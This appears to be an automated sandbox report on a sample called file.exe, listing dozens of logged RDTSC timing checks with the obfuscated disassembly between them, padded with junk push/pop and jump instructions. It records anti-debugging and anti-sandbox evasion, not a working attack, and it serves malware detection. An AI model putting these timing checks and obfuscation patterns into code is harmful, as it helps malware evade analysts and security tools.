                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7EFC second address: EB7F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE9170BF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F3DE9170BEEh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3DE9170BF1h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F3F second address: EB7F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F43 second address: EB7F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB84C4 second address: EB84E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE916F969h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB84E9 second address: EB850E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3DE9170BF5h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB850E second address: EB8512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB891C second address: EB895F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F3DE9170BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F3DE9170BFFh 0x00000012 jmp 00007F3DE9170BF9h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3DE9170BF4h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB895F second address: EB8963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8AAD second address: EB8ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE9170BEEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F3DE9170BE6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8ACA second address: EB8AD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8AD0 second address: EB8AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8AD6 second address: EB8AEB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3DE916F95Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8C12 second address: EB8C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8C16 second address: EB8C41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Fh 0x00000007 jmp 00007F3DE916F968h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8DB8 second address: EB8DC4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3DE9170BEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8F07 second address: EB8F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8F0B second address: EB8F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8F19 second address: EB8F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8F1F second address: EB8F2F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F3DE9170BE6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8F2F second address: EB8F50 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3DE916F95Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3DE916F961h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBDC77 second address: EBDC88 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3DE9170BE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBDC88 second address: EBDC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E880DB second address: E880E5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3DE9170BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E880E5 second address: E8810B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F3DE916F965h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8810B second address: E8810F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8810F second address: E8814C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F3DE916F96Eh 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3DE916F95Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E882F7 second address: E882FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E885A1 second address: E88625 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3DE916F960h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3DE916F958h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 clc 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F3DE916F958h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov di, cx 0x00000049 jo 00007F3DE916F95Bh 0x0000004f mov ecx, 6DB1F171h 0x00000054 nop 0x00000055 jmp 00007F3DE916F962h 0x0000005a push eax 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jp 00007F3DE916F956h 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88625 second address: E88629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E889B8 second address: E889BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E889BE second address: E889C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88CA4 second address: E88CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88CA8 second address: E88CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88CAC second address: E88CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88D89 second address: E6F3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F3DE9170BE8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D194Ah], ecx 0x00000029 mov edi, dword ptr [ebp+122D374Fh] 0x0000002f call dword ptr [ebp+122D1B38h] 0x00000035 jo 00007F3DE9170BFCh 0x0000003b jmp 00007F3DE9170BECh 0x00000040 pushad 0x00000041 push esi 0x00000042 pop esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE24E second address: EBE256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE256 second address: EBE25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE39B second address: EBE3BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3DE916F960h 0x0000000b pushad 0x0000000c jne 00007F3DE916F956h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE3BE second address: EBE3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3DE9170BE6h 0x0000000a jmp 00007F3DE9170BF5h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 jng 00007F3DE9170BE6h 0x0000001c pop eax 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE82A second address: EBE874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3DE916F968h 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jmp 00007F3DE916F95Dh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F3DE916F95Fh 0x0000001d jbe 00007F3DE916F956h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC60B0 second address: EC60B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC666B second address: EC6695 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3DE916F956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3DE916F968h 0x00000011 jg 00007F3DE916F956h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6695 second address: EC66AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC67FF second address: EC6814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE916F961h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC69B0 second address: EC69B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC69B4 second address: EC69DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F3DE916F956h 0x0000000e jmp 00007F3DE916F969h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6B10 second address: EC6B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3DE9170BE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6B1A second address: EC6B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F965h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F3DE916F956h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6B39 second address: EC6B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC75D8 second address: EC75F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3DE916F95Dh 0x00000008 jmp 00007F3DE916F95Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF4AE second address: ECF4C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jno 00007F3DE9170BE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF612 second address: ECF61E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F3DE916F956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF61E second address: ECF623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF623 second address: ECF62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF62B second address: ECF634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF1AF second address: ECF1D3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3DE916F958h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jc 00007F3DE916F95Ch 0x00000010 jnp 00007F3DE916F956h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F3DE916F95Ah 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECFFF1 second address: ECFFFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECFFFC second address: ED0002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED0002 second address: ED0008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED324F second address: ED3260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F3DE916F956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3260 second address: ED326C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3DE9170BE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED326C second address: ED3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3DE916F962h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3283 second address: ED32A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF9h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED556C second address: ED5574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED5574 second address: ED557A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED56A5 second address: ED56ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F3DE916F96Ah 0x0000000f push eax 0x00000010 jmp 00007F3DE916F961h 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA4EB second address: EDA4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA7A1 second address: EDA7AD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3DE916F95Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE00B second address: EDE042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jng 00007F3DE9170BF3h 0x0000000c jmp 00007F3DE9170BF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3DE9170BEAh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E40390 second address: E40396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E40396 second address: E403B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE9170BF9h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD6B2 second address: EDD6B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD6B8 second address: EDD6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E403F0 second address: E403F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3B0A second address: EE3B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3B0E second address: EE3B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3B13 second address: EE3B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE9170BF0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3B2E second address: EE3B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE241B second address: EE2421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE2421 second address: EE2433 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3DE916F956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3DE916F962h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE2573 second address: EE2579 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE2579 second address: EE2588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F3DE916F956h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE2588 second address: EE25A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3DE9170BE6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push esi 0x00000010 jc 00007F3DE9170BE6h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE25A5 second address: EE25A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE25A9 second address: EE25AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE25AD second address: EE25B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE2A08 second address: EE2A24 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3DE9170BE6h 0x00000008 jmp 00007F3DE9170BEFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E887A2 second address: E887A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E887A6 second address: E8880D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b movzx ebx, di 0x0000000e pushad 0x0000000f jmp 00007F3DE9170BF1h 0x00000014 popad 0x00000015 popad 0x00000016 mov ebx, dword ptr [ebp+1247C8F7h] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F3DE9170BE8h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov di, 8B90h 0x0000003a or edi, dword ptr [ebp+122D3502h] 0x00000040 add eax, ebx 0x00000042 movzx edx, di 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jne 00007F3DE9170BE6h 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8880D second address: E88813 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88813 second address: E88826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
